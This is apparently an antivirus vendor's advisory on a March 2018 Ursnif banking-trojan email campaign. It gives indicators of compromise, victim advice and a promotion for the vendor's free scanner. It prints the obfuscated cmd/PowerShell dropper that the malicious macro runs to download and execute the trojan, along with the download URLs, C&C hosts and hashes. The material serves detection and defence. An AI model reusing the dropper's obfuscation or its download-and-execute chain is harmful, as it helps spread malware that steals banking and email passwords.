TG Soft's C.R.A.M. (Anti-Malware Research Center) examined an email campaign spreading the Ursnif malware Trojan Banker March 15 and 16, 2018.
Cyber-criminals developed "Social engineering" methods for fraudulent mass mailings, to induce the victim to open infected attachments or click on links in the body of the message.
If you received a suspicious email, send it to C.R.A.M. (Center for Anti-Malware Research): How to send suspicious emails
|
INDEX
|
"Ursnif" malware campaign
Famiglia malware:
Ursnif
VirIT: Trojan.Win32.Ursnif.EQ, Trojan.DOC.Dropper.OP, Trojan.DOC.Dropper.OM, Trojan.Win32.Ursnif.ER
Description:
The email campaign started on March 15, 2018 and is continuing with a new wave today, March 16.
|
Subject: [It changes based on the email you receive]
|
|
Vedi allegato e di confermare. |
(Good morning,
See attached and to confirm).
How it spreads:
It exploits e-mail accounts configured in the infected pc, sending fake infected replies to messages ALREADY RECEIVED by the victim.
The body of the message is always the same (visible above in red), while the subject is different because it answers to messages received by the victim and therefore varies according to them.
The malicious attachment in the email is a DOC file that contains an AutoOpen MACRO that, as soon as it is started, downloads the malware and runs it.
The AutoOpen macro first executes the CMD.EXE file by passing it the following string as a parameter to run PowerShell (2018-03-15 campaign):
rhFXZhmvK RmVjRbXZszlijcamdjn lvLlVtdVjfQZil & %C^om^S^pEc%
%C^om^S^pEc% /V /c
set %EZmZEnibjGMZzfj%=ziJwsjlMVJAGr&&set %XRzNbKzkjXCilL%=p&&
set %zpripnwkZCZkaw%=ow&&
set %PQtilTRmLWujZMD%=GLVwzzR&&
set %OzDuOPYR%=!%XRzNbKzkjXCilL%!&&
set %LBGYnaEvmXjQqSu%=LSCmLPOTU&&
set %LEHbEfzlw%=er&&set %QqLYaunoLaRf%=!%zpripnwkZCZkaw%!&&
set %aPjAIMOMA%=s&&
set %iMOziKsPzidiudM%=bHLpvNh&&set %fWthJZh%=he&&
set %KBZYnMLwWK%=ll&&!%OzDuOPYR%!!
%QqLYaunoLaRf%!!%LEHbEfzlw%!!%aPjAIMOMA%!!%fWthJZh%!!%KBZYnMLwWK%!
"iex(( [rUnTimE.InTErOpSerVIceS.marShal]::
([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS()[1].nAME).iNVOKe(
[RuNtIME.intEROpSerViCeS.mARShAL]::sECuResTriNgtOglOBalALLoCANSi($('76492d
1116743f0423413b16050a5345MgB8AFEAVwBVAG4AbgBiAEwAcQBjACsAbgBpAGwAe
[..]
AAyAGMANAA3ADUAYwBhADEANgBkADMANABlADIAOQBmADcAOQA4AGUAMAA1ADIA
NAA1ADUAYgAwADIAZABjAGMAYQAxAA=='| CoNvErTTO-SeCUrEstRIng -kEY 3,211,236,
164,37,68,140,210,255,95,208,148,140,46,48,73,228,255,71,236,131,41,146,87,71,
244,26,241,36,138,128,131)) ) ) ) |
The cmd.exe runs a Powershell script:
powershell "iex(( [rUnTimE.InTErOpSerVIceS.marShal]::([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS() [1].nAME).iNVOKe([RuNtIME.intEROpSerViCeS.mARShAL] [..]
The PowerShell script downloads the Ursnif from the site
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker2.class and puts it into automatic execution.
The malware, after being started, creates a key in HKCU\Software\Microsoft\Windows\CurrentVersion\Run with [random value] = %USERPROFILE%\APPDATA\ROAMING\MICROSOFT\[CARTELLA CASUALE]\NOMEFILE.EXE.
The Ursnif malware makes an injection into the process EXPLORER.EXE
Examples:
Name: 5935890.exe
MD5: A54E54EF024C4D75107EC3B678D92DF3
Size: 439.808 byte
Compilation date: 14/03/2018 20.39.36
In the March 16 campaign, the Trojan Banker Ursnif is downloaded from the site http://krqweugmjasndasidhnjqwewq[.]com.
Note:
The malware downloaded is part of the Ursnif family, its peculiarities are to steal access passwords to important sites such as may be home banking, mail, ftp etc.
IOC 2018-03-15:
File DOC MD5:
0337DE1801F201DF55C03674C54B2393
1D3E80D6D0BA768B247E827D021E3084
226865CAF1359EEA285001F08A5F3D32
2F6B36CDBE4B6CECEEF61FDCEF2F671F
32180B39C4E88802DEA68123C91F4155
460226754514FCDB2A416762A84D1D76
55B2149912C6B21DD426946C4CA53C3E
5E30725075A5034132CE8D10759E1CC9
63ED633F158DA9E8DD04BD729A81FD2E
6AA1D7674D797922EA21F97E0BF24187
721022C9D4F56E90131944C67274F513
95185EA3A812DDAC912C654A23035E1F
990BFE696B68B8B97AF4BE1A93538798
A2323973AD6C6D0C970811F3593CBD96
AE430EFE808A9187952B40C4623C6715
E120782EDF6D4E56B16C6B9905929479
ED97EE2D08454ED55047538ABD393544
FCC2686C5D100F2AE1BD6C8B6CFD50CC
File EXE MD5:
1D9C5F892638EC933FADB850FB3ED905
59EFD009A993E2E1011CEDAB876039B1
7A5ED1A6740ADC4992744639F151EF57
A54E54EF024C4D75107EC3B678D92DF3
B28F02E785B037ADED0AB6E01F464B7D
C9326AB8F896F4AB256123427652B71B
D5F0F93B68612F4BBF7671C77743E44A
EBAE6BE4F1A8696EBD51F5618A91CD98
URL:
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker1.class
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker2.class
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker3.class
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker4.class
http://idqjduwhasfhasdbwejeasdh[.]com/NOIT/testv.php?l=itmaker5.class
IP: 138.128.5.85
Server C&C (Where exfiltrated data such as passwords and clipboard logs are sent):
https://ijquhgaspwqeasuahdqwe.net
IP server C&C: 138.128.5.96
IOC 2018-03-16 (in progress...):
File DOC MD5:
0D8C0A37B1B502873A0A915D0559135C
139103391187F1815002EE459CA18944
214670C43C9B1C7F0524DE99250CFB33
34FAF0E34C1F6A7AFA74CFC2466665C1
443A64E67A101511A1DD4D87010608A5
5BA5395AF7CE040A969CD535FF4CB867
5C17450FE11900385DAE2025FBF5AA7B
66577CE10DD7550D1DD54B6DFA409A4B
681682169C7B4DC4483C9B8F7F75AE1F
75F7DB9C8DBDC98BCB91D78FD435F8C2
8D0D64BADBEC02F341BE3A0B96EAEEEE
969293C0C6A1F7F265378C3A4E806610
9A8D25B71308168FD357B44E6507C2C9
9DF418676FA409B76DAA6D08EACC83D9
A154FFF1572D8FB67AD37491449DF487
A2626EB7F114E2B999AAF52ED3167B47
B3DDC826D65BDBAEF52EAC5524B95860
B82A0C08DF847470B21FA81EEEA2D918
C33DE58C333AFF4A107DAC6D6317D580
C4A209B5BE703675E8233A109AA3FEB0
C778CC39B58BCA11558074A9C3D600D4
D7F273320534BE032819F4A8AC5BB2D8
D96C3D656D7A6FB252344AB3553D082B
DCAA0663FFB4858479B9A2DAE3651A98
E614754DA733BFC4F41E2D191170242F
File EXE MD5:
A51E01AEA30DE8B559438D2CFC051AF0
URL:
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itpros.class
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itprosa.class
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itprosb.class
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itprosc.class
http://krqweugmjasndasidhnjqwewq[.]com/ANY/itprosd.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker1.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker2.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker3.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker4.class
http://krqweugmjasndasidhnjqwewq[.]com/NOIT/testv.php?l=itmaker5.class
How to identify a fake email
Experience and common sense are the first weapons to avoid these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of
ZIP-formatted attachments and, if possible, DO NOT enable automatic
macro execution. It is strongly discouraged to set up automatic execution of macros since simply opening
Word and
Excel files will see the immediate execution of macros without any prior alert.
In case you have been infected by a
Banker, the advice from TG Soft's C.R.A.M. is to take appropriate security precautions
even after the remediation of the system(s) involved such as changing the most commonly used passwords on the Web. In case the workstation involved is used for home-banking transactions, an assessment with your
credit institution is also recommended.. .
How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts
Sending materials to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
- Any suspect email can be sent directly by the recipient's e-mail, to the following mail lite@virit.com,choosing as sending mode "Forward as Attachment" and inserting in the subject section "Possible phishing page to verify" rather than "Possible Malware to verify";
- Save the e-mail to be sent to the TG Soft's C.R.A.M. for analysis as an external file to the e-mail program used. The resulting file must be sent by uploading it from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). Obviously if you want a feedback on the analysis of the data submitted, you have to indicate an e-mail address and a brief description of the reason for the submission (for example: possiible / probable phishing; possible / probable malware or other).
All this is to help you by trying to prevent you from running into credential theft, viruses/malware or even worse next-generation Ransomware / Crypto-Malware.
Integrate your PC / SERVER protection with Vir.IT eXplorer Lite
If you are not yet using Vir.IT eXplorer PRO, it is advisable to install, Vir.IT eXplorer Lite -FREE Edition-.to supplement the antivirus in use to increase the security of your computers, PC and SERVER indifferently,
Vir.IT eXplorer Lite has the following special features: |
 |
- freely usable in both private and corporate environments with Engine+Signature updates without time limitation;
- Interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend to use it as a supplement to the AntiVirus already in use as it does not conflict or slow down the system but allows to significantly increase security in terms of identification and remediation of infected files;
- It identifies and, in many cases, even removes most of the viruses/malware actually circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.It eXplorer PRO;
- Through Intrusion Detection technology, also made available in the Lite version of Vir.IT eXplorer, the software is able to report any new-generation viruses/malware that have set in automatically and proceed to send the reported files to TG Soft's C.R.A.M.
- Proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.
For Vir.IT eXplorer PRO users...
 |
For Vir.IT eXplorer PRO owners, it is also possible to contact for free TG Soft's technical phone support.The details can be found on the support page CLIENTS. |
C.R.A.M.
TG Soft's Anti-Malware Research Center
